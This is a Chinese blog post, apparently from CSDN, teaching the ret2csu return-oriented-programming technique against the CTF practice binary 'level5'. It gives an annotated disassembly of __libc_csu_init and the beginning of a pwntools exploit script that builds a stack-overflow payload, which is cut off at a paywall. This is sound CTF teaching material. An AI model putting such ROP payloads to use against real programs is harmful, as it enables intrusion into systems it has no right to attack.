栈溢出进阶

已于 2023-09-16 20:11:01 修改
阅读量113 收藏 1
点赞数
文章标签: 前端 microsoft 数据库
于 2023-09-16 20:10:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woshiyanfu/article/details/132922919
版权

ret2csu

原理

在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,分别是rdi、rsi、rdx、rcx、r8、r9,第7个以后的参数存放在栈中,gadget不够时可以使用__libc_csu_init 中的 gadgets
利用libc_csu_init中的两段代码片段来实现3个参数的传递

例题

level5
与ctfwiki上的例题有细微的差别,但解题思路是一样的

__libc_csu_init
.text:0000000000401190 ; void _libc_csu_init(void)
.text:0000000000401190 public __libc_csu_init
.text:0000000000401190 __libc_csu_init proc near ; DATA XREF: _start+16↑o
.text:0000000000401190 ; __unwind {
.text:0000000000401190 push r15
.text:0000000000401192 mov r15, rdx
.text:0000000000401195 push r14
.text:0000000000401197 mov r14, rsi
.text:000000000040119A push r13
.text:000000000040119C mov r13d, edi
.text:000000000040119F push r12
.text:00000000004011A1 lea r12, __frame_dummy_init_array_entry
.text:00000000004011A8 push rbp
.text:00000000004011A9 lea rbp, __do_global_dtors_aux_fini_array_entry
.text:00000000004011B0 push rbx
.text:00000000004011B1 sub rbp, r12
.text:00000000004011B4 sub rsp, 8
.text:00000000004011B8 call _init_proc
.text:00000000004011BD sar rbp, 3
.text:00000000004011C1 jz short loc_4011DE
.text:00000000004011C3 xor ebx, ebx
.text:00000000004011C5 nop dword ptr [rax]
.text:00000000004011C8
.text:00000000004011C8 loc_4011C8: ; CODE XREF: __libc_csu_init+4C↓j
.text:00000000004011C8 mov rdx, r15
.text:00000000004011CB mov rsi, r14
.text:00000000004011CE mov edi, r13d
.text:00000000004011D1 call ds:(__frame_dummy_init_array_entry - 403E10h)[r12+rbx*8]
.text:00000000004011D5 add rbx, 1
.text:00000000004011D9 cmp rbp, rbx
.text:00000000004011DC jnz short loc_4011C8
.text:00000000004011DE
.text:00000000004011DE loc_4011DE: ; CODE XREF: __libc_csu_init+31↑j
.text:00000000004011DE add rsp, 8
.text:00000000004011E2 pop rbx
.text:00000000004011E3 pop rbp
.text:00000000004011E4 pop r12
.text:00000000004011E6 pop r13
.text:00000000004011E8 pop r14
.text:00000000004011EA pop r15
.text:00000000004011EC retn
.text:00000000004011EC ; } // starts at 401190
.text:00000000004011EC __libc_csu_init endp
对第一段gadget的分析
在这里插入图片描述

1.add不需要,所以不必使用
2.把值pop到rbx寄存器中
3.把值pop到r12寄存器中
4.把值pop到r13寄存器中
5.把值pop到r14寄存器中
6.把值pop到r15寄存器中
7.返回

对第二段gadget的分析对第二段gadget的分析在这里插入图片描述

1.把r15的值传给rdx
2.把r14的值传给rsi
3.把r13的低32位的值传给rdi
4.调用函数
5.rbx的值加1
6.比较rbp和rbx的值
7.不为0(不相等)跳转,0(相等)则不跳转

总结一下

1.利用r13控制rdi
2.利用r14控制rsi
3.利用r15控制rdx
4.将rbx设置为0才不会产生偏移
5.利用call调用函数(call函数为跳转到某地址内所保存的地址,应该使用got表中的地址)
6.令rbp=rbx+1防止跳转
####在这里插入图片描述

checksec

ida

在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述

exp
from pwn import *
from LibcSearcher import *

context(os=‘linux’,arch=‘amd64’,log_level = ‘debug’)

level5 = ELF(‘./level5’)
sh = process(‘./level5’)

write_got = level5.got[‘write’]
read_got = level5.got[‘read’]
main_addr = level5.symbols[‘main’]
bss_base = level5.bss()
csu_front_addr = 0x00000000004011C8
csu_end_addr = 0x00000000004011E2
fakeebp = b’b’ * 8

#def csu(0,1,call,rdi,rsi,rdx,last)
def csu(rbx, rbp, r12, r13, r14, r15, last):
# pop rbx,rbp,r12,r13,r14,r15
# rbx should be 0,
# rbp should be 1,enable not to jump
# r12 should be the function we want to call
# rdi=edi=r13d
# rsi=r14
# rdx=r15
payload = b’a’ * (0x80) + fakeebp
payload += p64(csu_end_addr) + p64(rbx) + p64(rbp)

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
通过Stack Overflow线程栈溢出的问题实例,详解C++程序线程栈溢出的诸多细节
dvlinker的技术专栏
08-04 1万+
通过Stack Overflow线程栈溢出的问题实例,详解C++程序线程栈溢出的诸多细节
线程栈溢出异常,程序崩溃在汇编代码test dword ptr [eax],eax上的问题排查
热门推荐
dvlinker的技术专栏
07-15 3万+
本文详细讲述线程栈溢出异常,程序崩溃在汇编代码test dword ptr [eax],eax上问题的排查过程。
Windows下x64反汇编参数传递约定,一句话,调用顺序为从左到右, Function( rcx, rdx, r8,r9, [rsp+0x20], [rsp+0x28], [rsp+0x30]..
AppNinja 开发手记
11-09 4046
x64 体系结构是 x86 的向后兼容扩展。 它提供与 x86 相同的旧 32 位模式,以及新的 64 位模式。术语"x64"包括 AMD 64 和 Intel64。 指令集接近相同。x64 将 x86 的 8 个常规用途寄存器扩展为 64 位,并添加了 8 个新的 64 位寄存器。 64 位寄存器的名称以"r"开头,因此例如, eax 的 64 位扩展名为 rax。 新寄存器的名称为 r8 到 r15。每个寄存器的低 32 位、16 位和 8 位可直接在操作数中处理。 这包括寄存器,如 esi,其低 8
Windows x64 栈帧结构
weixin_30748995的博客
08-07 353
0x01 前言   Windows 64位下函数调用约定变为了快速调用约定,前4个参数采用rcx、rdx、r8、r9传递,多余的参数从右向左依次使用堆栈传递。本次文章是对于Windows 64位下函数调用的分析,分析各种参数情况下调用者和被调用函数的栈结构。 0x02 4参数时函数调用流程 64位下函数的调用约定全部用FASTCALL,就是前4个参数依次用rcx,rdx,r8,r...
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1254
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
NewStarCTF pwn
iczfy585的博客
10-21 1021
NewStarCTF中pwn的一些wp
如果保护LINUX二进制程序,二进制程序的一些保护措施
weixin_42600128的博客
05-10 438
二进制程序的一些常见保护。1、ASLRaslr是一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的的一种技术。也就是说程序每次执行时,栈、堆、库的位置都不一样。效果如下所示://环境:gcc version 7.3.0 (Ubuntu 7.3.0-27ubuntu1~18.04)#...
栈溢出进阶1
最新发布
woshiyanfu的博客
09-19 162
1.利用r13控制rdi2.利用r14控制rsi3.利用r15控制rdx4.将rbx设置为0才不会产生偏移5.利用call调用函数(call函数为跳转到某地址内所保存的地址,应该使用got表中的地址)6.令rbp=rbx+1防止跳转####
高级栈溢出技术—ROP实战(pivot)
ChuMeng1999的博客
01-09 663
目录预备知识关于ROP本系列rop实战题目的背景pivot涉及知识点实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmporium
64位汇编
yms0211的博客
10-19 1910
对上一篇汇编学习的扩展补充
x64汇编第三讲,64位调用约定与函数传参.
weixin_30888027的博客
06-01 1923
目录 x64汇编第三讲,64位调用约定与函数传参. 一丶复习X86传参 二丶x64汇编 2.1汇编详解 x64汇编第三讲,64位调用约定与函数传参. 一丶复习X86传参 在x86下我们汇编的传参如下: push eax call ...
64位BASM学习随笔(一)
闲人阿发伯的业余编程心得
03-15 9250
64位BASM学习随笔中的很多原则问题不仅仅适应Delphi,也适用其它64位程序语言,因为64位方式下,程序架构都是统一的。
X64汇编语言寄存器结构及其与X86架构编程区别
ComputerInBook的专栏
02-16 7334
目录 1. 关于X64架构 2. X64架构的寄存器结构 2.1 通用目的寄存器 2.2浮点数寄存器 2.3指令指针寄存器 2.4段寄存器 2.5标识寄存器 2.6控制寄存器 2.6.1控制寄存器CR0 2.6.2控制寄存器CR2 2.6.3控制寄存器CR3 2.6.4控制寄存器CR4 2.6.5控制寄存器CR8 2.6.6控制寄存器CR1,CR5-7, CR9-15 2.7 模式指定寄存器(MSRs)(Model Specific Registers) 2.7.1 IA32
vc在x64体系的一般传参数方式
bbqzsl的博客
12-28 1930
前篇分析过在objc中函数调用传参的一般方式,本篇分析vc在x64体系中的一般传参方式
CSAPP第三章——程序的机器级表示:学习笔记总结
Eternitykc的博客
11-29 1336
花了半个多月,补完王爽老师的汇编语言后,跟着CMU的视频课+课本,学完了第三章的知识,最深的感触就是CSAPP无论是视频还是书的质量都非常的硬,不愧它的盛名。(lab6和课后的家庭作业还没做,之后再补) 现在来对前面所学做一个总结。(大致按照CMU视频的顺序进行) 一、Basics 基础 1.使用指令新建、编辑、汇编、链接汇编语言程序 ①新建并编辑源代码 命令:getdit sum.c 说明:gedit是一个GNOME桌面环境下兼容UTF-8的文本编辑器。使用vi或者vim同样可以实现新建与编辑。 ②预处理
C语言参数传递所使用的寄存器
天马行空
02-09 8308
探索下C语言的函数是如何传递参数的,寄存器?栈?,何时使用寄存器,使用哪些寄存器,什么时候使用栈来传递参数。这是容易疑惑的地方。 用gcc编译C程序,看看C语言是如何传递参数的。同时用到了edb调试器。使用的操作系统是linux 64位。 思路是编写一个简单的函数,具有个数不同的参数。函数没有具体的意义,纯粹是为了探索C语言的函数是如何传递参数的。 函数有1个参数 // a.c // gc...
Pwnbeta-rdi,rsi,rdx,rcx,r8,r9
MuMuLee_的博客
09-17 982
C伪代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi setvbuf(stdout, 0LL, 2, 0LL); v3 = "DEBUG"; if ( !getenv("DEBUG") ) v3 = (const char *)5; return ...
栈溢出攻击深度探索:Exploit编写教程
教程详细讲解了从栈溢出到利用Metasploit框架、调试器模块、插件以及各种防御机制的绕过方法。此外,还包括Unicode exploit的编写、Shellcode的基础和高级应用,以及如何利用Return Oriented Programming (ROP) 绕过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值